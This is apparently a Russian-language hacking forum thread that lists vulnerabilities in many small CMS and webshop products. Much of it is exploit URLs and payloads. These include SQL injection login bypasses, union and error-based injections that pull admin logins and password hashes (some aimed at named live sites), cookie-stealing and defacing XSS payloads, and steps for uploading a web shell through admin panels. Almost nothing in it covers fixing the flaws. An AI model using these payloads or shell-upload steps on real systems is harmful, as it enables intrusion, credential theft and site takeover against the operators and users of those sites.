OMECO®webshop 4.0 BLIND SQL INJECTION Пример: Result: Code: [COLOR=White]Duplicate entry '[B]4.1.221[/B]' for key 1[SIZE=4][/COLOR] SQL INJECTION AUTHORIZATION BYPASS[/SIZE] Ihr Login: ' or 1=1# 1 Passwort: ' or 1=1# 1 Активная xss При регистрации почти все поля уязвимы вписуем Code: <script>document.body.innerHTML ="<style>body{ visibility:hidden; }</style><div style =visibility:visible;><img src= https://forum.antichat.ru/antichat/pic/logo.gif></img></div></script> или что-то другое OMECO®webcontent CMS Пассивная xss: http://www.omeco.de/ В Поиске: "><script>alert(xss)</script>
SiteYouSelf CMS Офф сайт: http://www.siteyourself.de/ xss inj. Code: http://www.siteyourself.de/start.php?sys_suche=aa"><script>alert(document.cookie)</script>&Button.x=19&Button.y=15&seitenid=43&seiteninhaltid=69&langid=1 Путь: http://www.siteyourself.de/start.php?sys_suche=&Button.x=19&Button.y=15&seitenid=43&seiteninhaltid=-69
Xitex WebContent M1 CMS Платна офф сайт: http://webcontent-m1.com/ Passive XSS Code: http://webcontent-m1.com/m1/en/buyonline/standard_vs_professional В поле: Sign up for free e-newsletter XSS Please correct you e-mail address E-mail: </script><script>alert('xss')</script> ____ Code: http://webcontent-m1.com/m1/en/buyonline/trial_version http://webcontent-m1.com/m1/en/contact_us http://webcontent-m1.com/m1/en/buyonline/overview http://webcontent-m1.com/m1/en/send_feedback Нужно минимум 2 поля заполнить хсс кодом. "><script>alert(document.cookie)</script> также фильтра нету никакого т.е можно все заполнить кавычками.
JobExpert http://jobexpert.sd-group.org.ua/ XSS Уязвим параметр currency Code: http://jobexpert.sd-group.org.ua/index.php?ut=competitor&do=search&q=xss&base=vacancy&type=any&id_section=1&id_profession=1t&id_region=1&id_city=1&pay_from=1¤cy=<script>alert('d0s')</script>&period=0&records=10
CMS.SSPRO http://www.sspro.ru/ XSS Code: http://www.demo.sspro-soft.ru/?pgid=1&mod=1<script>alert(123)</script>
IBPRO CMS http://cms.ibpro.com.ua/ XSS Code: http://cms.ibpro.com.ua/search/?qs=</script><script>alert('d0s')</script>
OSG WebShop офф сайт: http://www.osg.ru/ Xss Code: http://www.demo.osg.ru/forum.html Вбиваем "><script>alert('ded-m0r0z')</script> Уязвимые поля: Code: Ваше имя Ваш e-mail Ваш адрес в Internet ну и гет запрос будет примерно таким: Code: http://www.demo.osg.ru/forum.html?idc=0&stype=0&pgn=1&idbook=97&idmain=0&idmess=0&rnd=14613&pgn=1&s_cf=28%2E50&s_ch=6A675D26682717306851D40C1878BD14&gbmess=%22%3E%3Cscript%3Ealert%28%27ded%2Dm0r0z%27%29%3C%2Fscript%3E&idbook=97&gbwww=%22%3E%3Cscript%3Ealert%28%27ded%2Dm0r
NReco.Site CMS офф сайт: nrecosite.com XSS Пишем в поиск: Code: <script>alert('ololo')</script> Гет запрос такой будет: Code: http://www.nrecosite.com/search.aspx/ru?q=<script>alert('ololo')</script>
Заливка шелла в Shop-Script PREMIUM. Нужны права Админа. Админка по умолчании расположена в site.com/admin.php Заходим в Каталог->Категории и товары->Добавить новый товар. В появившемся окне заполняем форму, как угодно, и главный момент это, ставим галочку на чекбоксе Продукт является программой и заливаем пустой .htaccess дабы переписать существующий .htaccess в папке куда далее зальем наш web-shell. Повторяем процедуру и уже заливаем шелл. Шелл заливается в папку : site.com/products_files/ имя загружаемого файла не изменяется.
Zikula CMS Version 1 pXSS: zikula.de /index.php http://demo.zikula.de/index.php?module=benutzer&func="></div><script>alert('xss')</script>
bcms, быстро cms офф сайт: http://www.bistro-site.ru/ их хостинг: http://www.bistro-host.ru/ вообще это вебдизовая студия, но у них свой платный двиг. На большинстве сайтов на странице с новостями. MySQL inj Code: http://www.linefirm.ru/news/text?newsid=-6+union+select+1,concat_ws(0x3a,login,password),3,4,5,6,7+from+b_admin-- админка: /badmin Имеется cpanel у сайтов на их хостинге. Зайдя в диры, можно посмотреть содержимое папок у большинства сайтов(в приведённом мною так не попасть): /bfiles, /bsystem в /bfiles складируются любые файлы через админку, но на некоторых сайтах стоят права ток на чтение из этой папки. на старых версиях двига юзается md5 для хэша, на новых - так и не подобрал(хорошо бы, если и мне скажете, если подберёте)).
1) Дата: 25.08.2011 2) Продукт: Официальный сайт . Версия - не известна. StewieEngine Framework 3) Уязвимость: XSS 4) Автор: Фараон 5) Тип: удалённая 6) Опасность: 3 7) Описание: XSS и этим все сказано. Код отсутствует так как cms платная. 8) Эксплоит: http://www.sibcontact.ru/admin/login.php?back="><script>document.write('<h1>LOL</h1>');</script> 9) Решение: htmlspecialchars($_GET[back]);
NetCat CMS Уязвимость: Множественное раскрытие путей Примеры: /netcat/modules/calendar/showpreview.php?id=-1 (требует прав админа) /netcat/full.php?classPreview=1 Уязвимость: Инлуд (раскрутить нельзя ) Примеры: /netcat/modules/netshop/post.php?system=bank (bank - имя скрипта находящегося в каталоге /netcat/modules/netshop/payment) З.Ы. Все вышеописанные уязвимости присутствуют на офф. сайте - netcat.ru
KASSELER CMS Официальный сайт: kasseler-cms.net Версия: 2.2 (последняя на данный момент) Уязвимость: Активная XSS Уязвимый параметр: user_gtalk POST: Code: www.site.com/account/save_controls.html?days=00&months=0&years=00&user_gender=0&user_occupation=&user_interests&user_locality=&user_locality_hk=&user_signature=&language=russian&template=kasseler2&user_gmt=4&hide_user_viewemail=set&hide_user_pm_send=set&user_pm_send=on&hide_user_new_pm_window=set&user_new_pm_window=on&user_email=Ваш[email protected]&user_icq=&user_aim=&user_yim=&user_msnm=&user_skype=&user_gtalk=<script>alert('XSS by Mr. Penguin')</script>&user_website=http://&set_avatar=&avatar=animation&userfile=&user_password=&user_password_hk&user_newpassword=&user_newpassword_hk=&user_renewpassword=&user_renewpassword_hk=&hide_user_forum_mail=set&cmd_forum_mail=0 PoC: Code: http://kasseler-cms.net/account/save_controls.html?days=00&months=0&years=00&user_gender=0&user_occupation=&user_interests&user_locality=&user_locality_hk=&user_signature=&language=russian&template=kasseler2&user_gmt=4&hide_user_viewemail=set&hide_user_pm_send=set&user_pm_send=on&hide_user_new_pm_window=set&user_new_pm_window=on&user_email=Ваш[email protected]&user_icq=&user_aim=&user_yim=&user_msnm=&user_skype=&user_gtalk=<script>alert('XSS by Mr. Penguin')</script>&user_website=http://&set_avatar=&avatar=animation&userfile=&user_password=&user_password_hk&user_newpassword=&user_newpassword_hk=&user_renewpassword=&user_renewpassword_hk=&hide_user_forum_mail=set&cmd_forum_mail=0
ZRP CMS Sql-injection Уязвимость платного ZRP CMS, в файле addbasket.php, в параметре dataID, что позволяет внедрять sql-команды. Exploit: Code: addcard?dataID=117+and(select+1+from(select+count(*),concat((select+concat(login,0x3a,passwd,0x00)+from+zrp_user+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)--+f Примеры: Code: http://www.photo[google]festival.info/addcard?dataID=117+and(select+1+from(select+count(*),concat((select+concat(login,0x3a,passwd,0x00)+from+zrp_user+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)--+f http://www.elex[google]pro.ru/addcard?dataID=117+and(select+1+from(select+count(*),concat((select+concat(login,0x3a,passwd,0x00)+from+zrp_user+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)--+f http://www.plw[google]ha.kz/addcard?dataID=117+and(select+1+from(select+count(*),concat((select+concat(login,0x3a,passwd,0x00)+from+zrp_user+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)--+f Админка по адресу /zrp_admin/. Много раскрытии путей... В админке, мягко говоря, п****ц, везде скульи. Оригинал поста в моем блоге , здесь: http://dbitems.ru/blog/?x=entry:entry120405-142125
Движок HLSTATX exploit Код: host/ingame.php?mode=pro ./avatar.jpg CMS казино Стать кассиром передав в качестве Cookie username="любое кышы кышы" Все данные хранятся в не зашифрованном виде. XSS kasa/stat.php?user=[xss] rg=on kasa/stat2.php?user=[xss]
Smart-CMS Уязвимость: SQL-Injection http://www.site.com/program/link.php?act=list&id=[SQLi] Уязвимость: XSS-Active http://www.site.com/program/register.php Поля: "User name", "Reporter name". http://1337day.com/exploits/19051
Множественные уязвимости в Budhae CMS Нашёл - BigBear URL разработчика - www.asuhanov.com/ourcms.php demo - _ttp://demo.budhaecms.ru/budhae/index.php Active XSS при добавлении/просмотре пользователя Уязвимый код /mods/component_user/add_user.php Code: if ($_POST['process']==1) { [COLOR=Magenta]$ADDUSER['login']=$_POST['login'];[/COLOR] [COLOR=Magenta]$ADDUSER['fullname']=$_POST['fullname'];[/COLOR] $ADDUSER['types']=$_POST['types']; $ADDUSER['pass']=$_POST['pass']; $ADDUSER['confirm']=$_POST['confirm']; if ($_POST['pass']==$_POST['confirm']){ if ($SID->NewUser($ADDUSER)==1){echo ShowMessage('Пользователь добавлен',1);}else{echo ShowMessage('Такой пользователь уже существует',0);} echo ShowMessage('Пароли не совпадают',0); }else{ echo ShowMessage('Пароли не совпадают',0); } } /mods/component_user/list_user.php Code: $USERS = $SID->GetListOfUser(); $PRNUSER=''; for ($i=0;$i<sizeof($USERS);$i++) { $PRNUSER.='<strong>Пользователь: </strong>'.[COLOR=Magenta]$USERS[$i]["budhae_login"].' ('.$USERS[$i]["budhae_fullname"][/COLOR].') - <strong>'.$USERS[$i]["budhae_type"].'</strong> - <img src="images/sm_icon1.jpg" width="25" height="23"><a href="'.$ColLines[$LatestLines].'?mode=edituser&sid='.$USERS[$i]["unique"].'" id="inside_blue_links">Редактировать</a> <img src="images/sm_icon2.jpg" width="25" height="23"><a href="'.$ColLines[$LatestLines].'?mode=delete&u='.$USERS[$i]["unique"].'" id="inside_blue_links">Удалить</a><br>'; } Вектор атаки - добавляем пользователя в админке http://site/admin/b_users.php Login = <script>alert(1234)</script> ФИО = <script>alert(12345)</script> Active XSS при редактировании карты сайта Уязвимый код /classes/budhae_webpage.php Code: function AddNewPages($INFO){ include_once ("sql.php"); $execute2 = new DBConnect; $execute2->Connect(); $SQL="INSERT INTO `webpages` (`name`,`url`,`type`) VALUES ('"[COLOR=Magenta].$INFO["name"]."','".$INFO["url"][/COLOR]."','".$INFO["type"]."');"; $dump = $execute2->Query($SQL); $execute2->Close(); ... function GetAllPages(){ include_once ("sql.php"); $execute = new DBConnect; $execute->Connect(); $SQL="SELECT * FROM `webpages`"; $dump = $execute->Query($SQL); $Count=0; while ($row=mysql_fetch_array($dump)){ $SID[$Count]['id']=$row['id']; [COLOR=Magenta]$SID[$Count]['name']=$row['name'];[/COLOR] [COLOR=Magenta]$SID[$Count]['url']=$row['url'];[/COLOR] $SID[$Count]['type']=$row['type']; $Count++; }; $execute->Close(); return $SID; } Вектор атаки Добавляем новую страницу http://site/admin/b_weburl.php?mode=add&step=1 Название = <scipt>alert(100)</script> URL = <script>alert(200)</script> Active XSS при добавлении фото Уязвимый код /classes/budhae_gallery.php Code: function AddGallery($name,$gid,$tn) { include_once ("sql.php"); $execute2 = new DBConnect; $execute2->Connect(); $TableName='bd_'.$gid.'_galleryname'; $SQL="INSERT INTO `".$TableName."` (`gnames`,`description1`) VALUES ('".[COLOR=Magenta]$name[/COLOR]."','".$tn."');"; $dump = $execute2->Query($SQL); $execute2->Close(); } ... function GetAllGallery() { include_once ("sql.php"); $execute = new DBConnect; $execute->Connect(); $SQL="SELECT * FROM `gallery_table`"; $dump = $execute->Query($SQL); $Count=0; while ($row=mysql_fetch_array($dump)){ $SID[$Count]['id']=$row['id']; [COLOR=Magenta]$SID[$Count]['name']=$row['name'];[/COLOR] $SID[$Count]['idgallery']=$row['idgallery']; $Count++; }; Вектор атаки Добавляем новую галлерею http://site/admin/b_gallery.php?gid=&method=add Название галереи = <scipt>alert(100)</script> SQL-Injection при просмотре "Типа Новостей" Уязвимый код /classes/budhae_cats.php Code: function GetPageNameById($id,$gid){ $execute = new DBConnect; $execute->Connect(); $TableName='bd_'.$gid.'_list'; [COLOR=Magenta] $SQL="SELECT * FROM `".$TableName."` WHERE `id`=".$id." ORDER BY `show` ASC";[/COLOR] $dump = $execute->Query($SQL); while ($row=mysql_fetch_array($dump)){ $datetotal = $row['name']; }; $execute->Close(); return $datetotal; } Exploit http://site/admin/b_catsuser.php?gid=MyCats&method=edit&id=2+and+1=1+group+by+3 http://site/admin/b_catsuser.php?gid=MyCats&method=edit&id=2+and+1=1+union+select+1,@@version,3 SQL-Injection при просмотре "Фотоальбома" Уязвимый код /classes/budhae_cats.php Code: function GetPageNameById($id,$gid){ include_once ("sql.php"); $execute = new DBConnect; $execute->Connect(); $TableName='bd_'.$gid.'_galleryname'; [COLOR=Magenta]$SQL = "SELECT * FROM `".$TableName."` WHERE `id` =".$id;[/COLOR] $dump = $execute->Query($SQL); while ($row=mysql_fetch_array($dump)){ $SName = $row['gnames']; }; $execute->Close(); return $SName; } Exploit http://site/admin/b_catsuser.php?gid=MyCats&method=edit&id=2+and+1=1+group+by+7 http://site/admin/b_catsuser.php?gid=MyCats&method=edit&id=2+and+1=1+union+select+1,@@version,3,4,5,6,7 ByPass Authentication Уязвимый код /classes/budhae_user.php Code: function UserLogin($USERID){ $USERID['login']=strtolower($USERID['login']); include_once ("sql.php"); $execute = new DBConnect; $execute->Connect(); [COLOR=Magenta]$SQL="SELECT * FROM users WHERE `login`='".$USERID['login']."' AND `password` ='".$USERID['password']."' LIMIT 1;";[/COLOR] $dump = $execute->Query($SQL); $row=mysql_fetch_array($dump); @session_start(); $_SESSION['budhae_login']=$row['login']; $_SESSION['budhae_password']=$row['password']; $_SESSION['budhae_type']=$row['type']; $_SESSION['budhae_fullname']=$row['fullname']; $_SESSION['budhae_date']=$row['date']; $_SESSION['budhae_status']='approved'; $_SESSION['unique']=$row['unique'];; return session_id(); $execute->Close(); } Exploit http://site/admin/index.php login= 1' or 1='1 pass = 1' or 1='1 Раскрытие путей при любом обращении к файлам в /mods _ttp://site/admin/mods/component_ftp/companent_main.php _ttp://site/admin/mods/component_detect_cats.php Code: Fatal error: Class 'Files' not found in /var/www/clients/client11/web106/web/demo/budhae/mods/component_ftp/companent_main.php on line 3 Code: Fatal error: Class 'Components' not found in /var/www/clients/client11/web106/web/demo/budhae/mods/component_detect_cats.php on line 7 Заливка шелла _ttp://site/admin/filecomponent.php Загружаемые расширения не фильтруются ---> shell.php P.S. Очень дырявый и бажный движок. Перед покупкой 100 раз подумайте !!! PoC: http://ioanidi.com/admins/
CMS alfasfera.com Уязвимости к CMS этой веб-студии. SQL Injection (POST method) Идем на страницу восстановления пароля: Code: [COLOR=red]/page/new_pass/[/COLOR] Вставляем в поле E-Mail SQL запрос. Панель админ-авторизации: /admin Примеры уязвимых сайтов: Уязвимые сайты найти можно у них в портфолио, вот два примера. _ttp://imprus.su - Онлайн игра _ttp://antipedofil.org - Оккупай-Педофиляй ит.д. Хэширование пароля Пароль хэшируется в MD5 с добавлением соли. Code: [COLOR=Red]497911ed40a7e76681c5e93113f9e4a1:tt-[/COLOR] Этот хэш присутствует на всех сайтах, так что это тоже можно считать уязвимостью. Найдено мною
